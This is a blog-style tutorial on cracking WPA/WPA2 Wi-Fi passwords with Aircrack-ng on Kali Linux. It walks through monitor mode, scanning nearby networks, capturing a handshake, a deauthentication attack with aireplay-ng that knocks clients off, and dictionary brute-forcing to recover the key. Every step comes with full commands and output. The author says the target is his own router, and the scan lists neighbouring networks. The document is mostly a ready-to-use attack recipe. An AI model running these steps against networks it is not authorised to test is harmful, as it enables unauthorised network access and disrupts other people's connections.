Hacking Wi-Fi with Aircrack-ng

1

This is an article about how to crack WPA/WPA2 passwords with Aircrack-ng.

Basic environment
System: Kali Linux 2016.1
Tool: USB wireless adapter
Set mode to monitor
Boot kali linux, connect USB wireless adapter.
Type in terminal:

root@kali:~/Desktop# ifconfig wlan0 down
root@kali:~/Desktop# iwconfig wlan0 mode monitor
root@kali:~/Desktop# iwconfig
wlan0 IEEE 802.11bgn Mode:Monitor Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:off
 
lo no wireless extensions.
 
eth0 no wireless extensions.

Now mode is changed from managed to monitor.

Collecting wireless signals nearby

root@kali:~/Desktop# airodump-ng wlan0
 CH  5 ][ Elapsed: 30 s ][ 2016-09-18 03:05                                         
                                                                                                                                                                                  
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                                                                                                  
 74:1F:4A:0C:77:71  -54       16        0    0   1  54e. OPN              ChinaUnicom                                                                                             
 74:1F:4A:0C:77:70  -55       16        0    0   1  54e. OPN              nuaa.portal                                                                                             
 44:97:5A:D7:8F:8E  -64       11        0    0  12  54e  WPA2 CCMP   PSK  20604                                                                                                   
 74:1F:4A:0C:2E:B1  -75       12        0    0   6  54e. OPN              ChinaUnicom                                                                                             
 74:1F:4A:0C:2E:B0  -76       12        0    0   6  54e. OPN              nuaa.portal                                                                                             
 44:97:5A:68:6E:BE  -77       14        0    0  13  54e  OPN              FAST_6EBE                                                                                               
 44:97:5A:8A:C6:7A  -78       14        0    0   3  54e  OPN              FAST_C67A                                                                                               
 3C:A3:48:47:83:DE  -80       13        0    0   6  54e. WPA2 CCMP   PSK  vivo Y913                                                                                               
 70:BA:EF:E8:DD:D1  -82        7        0    0   6  54e. OPN              ChinaUnicom                                                                                             
 70:BA:EF:E8:DD:D0  -83        5        0    0   6  54e. OPN              nuaa.portal                                                                                             
                                                                                                                                                                                  
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                                                                        
                                                                                                                                                                                  
 44:97:5A:D7:8F:8E  A0:99:9B:1A:0B:FF  -32    0 -24e     0        1

Wait for 10s, terminate with ctrl+c.
Now I’ve got all available wireless signals.

Analyze data

Locate attack target by ssid, here I’m going to use my router for example.
My ssid: 20604.

BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 44:97:5A:D7:8F:8E  -64       11        0    0  12  54e  WPA2 CCMP   PSK  20604

Infomation of 20604:
BSSID: 44:97:5A:D7:8F:8E
CHANNEL: 11
CIPHER: WPA2
ESSID: 20604

Launch attack

root@kali:~/Desktop# airodump-ng -c 11 --bssid 44:97:5A:D7:8F:8E -w /root/Desktop/ wlan0

Airodump-ng:
-c                  channel
–bssid         bssid
-w                 directory to save packet data
wlan0            network interface.
I prefer to use terminator, sniffing left and excute right:

root@kali:~# aireplay-ng -0 1 -a 44:97:5A:D7:8F:8E wlan0

Wait for handshake.

CH 12 ][ Elapsed: 12 s ][ 2016-09-18 03:20 ][ WPA handshake: 44:97:5A:D7:8F:8E                                         
                                                                                                                                                                                 
BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                                                                                                 
44:97:5A:D7:8F:8E  -66 100      149       68    3  12  54e  WPA2 CCMP   PSK  20604                                                                                               
                                                                                                                                                                                 
BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                                                                        
                                                                                                                                                                                 
44:97:5A:D7:8F:8E  A0:99:9B:1A:0B:FF  -32    1e-24e   994       73                                                                                                                
44:97:5A:D7:8F:8E  9C:FC:01:AB:1F:28  -48    1e-24    912      149                                                                                                                
44:97:5A:D7:8F:8E  D4:F4:6F:64:EF:85  -72    0 -24      0        6

Brute forcing

Now 4 files on Desktop:

  • 01.csv
  • 01.kismet.csv
  • 01.kismet.netxml
  • 01.cap

I only need 01.cap.

root@kali:~# aircrack-ng -a2 -b 44:97:5A:D7:8F:8E -w /root/Desktop/test.txt /root/Desktop/*.cap

This is one dictionary only 88888888(my password for test).

                           Aircrack-ng 1.2 rc4
[00:00:00] 1/0 keys tested (165.67 k/s) 
Time left: 0 seconds                                   inf%
                     KEY FOUND! [ 88888888 ]
Master Key     : 54 69 F8 8E A5 E2 FB 10 E8 E6 A5 09 C9 82 43 DA 
                 B0 05 7E 66 2F 59 20 BF 51 C8 27 BC 18 90 F4 18 
Transient Key  : 90 1E 4F 72 FD 2D D2 2A FE FE 82 59 F8 01 EB 7B 
                 C9 16 1B D1 08 D5 80 F6 04 28 93 45 C0 D3 83 5E 
                 01 DB 1F C6 ED 31 31 A9 A3 FA 1B FB 19 F3 B4 EB 
                 DD 90 59 D5 CD 23 4E AB 9C 4F 09 DF CF E8 BC BB 
EAPOL HMAC     : 10 4E 71 12 8B 77 DC D5 64 C7 18 2D 4F DA 98 77

About dictionaries
Time depends on dictionaries.

Leave A Reply

苏ICP备16066660号-1

苏公网安备 32011502010432号